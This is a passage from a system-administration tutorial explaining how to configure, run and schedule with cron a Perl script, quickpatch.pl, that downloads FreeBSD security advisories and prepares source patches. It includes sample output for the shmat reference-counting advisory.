# The release plus security patches branch for FreeBSD that you are

# following in cvsup.

# It should always be along the lines of RELENG_X_X , example RELENG_4_9

$release='RELENG_4_9';

The next few paths are fine as they are, unless you have a particular reason to change them:
# Ftp server mirror from where to fetch FreeBSD security advisories

$ftpserver="ftp.freebsd.org";

# Path to store patcher program files

$patchdir="/usr/src/";

# Path to store FreeBSD security advisories

$advdir="/var/db/advisories/";

$advdirtmp="$advdir"."tmp/";

If you're planning on applying the patches manually and, when required, rebuilding your kernel yourself, leave the next section as is. If you're brave enough to automate the whole works, make sure that the following paths accurately reflect your kernel configuration file and build directories:
# Path to your kernel rebuild script for source patches that require kernel

#rebuild

$kernelbuild="/usr/src/buildkernel";

#$kernelbuild="cd /usr/src ; make buildkernel KERNCONF=GENERIC && make

#installkernel KERNCONF=GENERIC ; reboot";

# Path to your system recompile script for patches that require full

# operating system recompile

$buildworld="/usr/src/buildworld";

#$buildworld="cd /usr/src/ ; make buildworld && make installworld ; reboot";

#Run patch command after creation, default no

$runpatchfile="0";

# Minimum advisory age in hours. This is to make sure you don't patch

# before your local cvsup server has had a

# chance to receive the source change update to your branch, in hours

$advisory_age="24";

Review the email accounts so the appropriate account receives notifications:
# Notify email accounts, eg: qw(billg@microsoft.com root@localhost);

@emails = qw(root);

Running the Hack
Run the script without any arguments to see the available options:
# ./quickpatch.pl

# Directory /var/db/advisories/ does not exist, creating

# Directory /var/db/advisories/tmp/ does not exist, creating

Quickpatch - Easy source based security update system

"./quickpatch.pl updateadv" to download / update advisories db

"./quickpatch.pl patch" or "./quickpatch.pl patch > big_patch_file" to

create patch files

"./quickpatch.pl notify" does not do anything but email you commands of what

it would do

"./quickpatch.pl pgpcheck" to PGP check advisories

Before applying any patches, it needs to know which patches exist. Start by downloading the advisories:
# ./quickpatch.pl updateadv

This will connect to ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories and download all of the advisories to /var/db/advisories. The first time you use this command, it will take a while. However, once you have a copy of the advisories, it takes only a second or so to compare your copies with the FTP site and, if necessary, download any new advisories.
After downloading the advisories, see if your system needs patching:
# ./quickpatch.pl notify

#

If the system is fully patched, you'll receive your prompt back. However, if the system is behind in patches, you'll see output similar to this:
# ./quickpatch.pl notify

######################################################################

####### FreeBSD-SA-04%3A02.shmat.asc

####### Stored in file /var/db/advisories/tmp/FreeBSD-SA-04%3A02.shmat

####### Topic: shmat reference counting bug

####### Hostname: genisis - 20/2/2004 11:57:30

####### Date Corrected: 2004-02-04 18:01:10

####### Hours past since corrected: 382

####### Patch Commands

cd /usr/src

# patch < /path/to/patch

### c) Recompile your kernel as described in

and reboot the

system.

/usr/src/buildkernel

## Emailed root

It looks like this system needs to be patched against the "shmat reference counting bug." While running in notify mode, quickpatch emails this information to the configured address but neither creates nor installs the patch.
To create the patch, use:
# ./quickpatch.pl patch

#########################################################

####### FreeBSD-SA-04%3A02.shmat.asc

####### Stored in file /usr/src/FreeBSD-SA-04%3A02.shmat

####### Topic: shmat reference counting bug

####### Hostname: genisis - 21/2/2004 10:41:54

####### Date Corrected: 2004-02-04 18:01:10

####### Hours past since corrected: 405

####### Patch Commands

cd /usr/src

# patch < /path/to/patch

### c) Recompile your kernel as described in

# and reboot the

#system.

/usr/src/buildkernel



# file /usr/src/FreeBSD-SA-04%3A02.shmat

/usr/src/FreeBSD-SA-04%3A02.shmat: Bourne shell script text executable

This mode creates the patch as a Bourne script and stores it in /usr/src. However, it is up to you to apply the patch manually. This may suit your purposes if you intend to review the patch and read any notes or caveats associated with the actual advisory.
Automating the Process
One of the advantages of having a script is that you can schedule its execution with cron. Here is an example of a typical cron configuration for quickpatch.pl; modify to suit your own purposes. Remember to create your logging directories and touch your log files before the first run.
# Every Mon, Wed, and Fri at 3:05 do an advisory check and download any

# newly released security advisories

5 3 * * 1,3,5 root /etc/scripts/quickpatch.pl updateadv > \

/var/log/quickpatch/update.log 2>&1



# 20 minutes later, check to see if any new advisories are ready for use

# and email the patch commands to the configured email address

25 3 * * 1,3,5 root /etc/scripts/quickpatch.pl notify >> \

/var/log/quickpatch/notify.log 2>&1



# 24 hours later patch mode is run which will run the patch commands if

# no one has decided to interfere.

25 3 * * 2,4,6 root /etc/scripts/quickpatch.pl patch >> \

/var/log/quickpatch/patch.log 2>&1
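The log files the crontab above appends to must exist before the first run. A one-time setup sketch, pointed at a scratch directory here so it can be run safely anywhere; on the real system LOGDIR would be /var/log/quickpatch:

```shell
# Create the logging directory and empty log files for quickpatch.
LOGDIR=$(mktemp -d)    # substitute /var/log/quickpatch on the real system
mkdir -p "$LOGDIR"
touch "$LOGDIR/update.log" "$LOGDIR/notify.log" "$LOGDIR/patch.log"
ls "$LOGDIR"
```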
 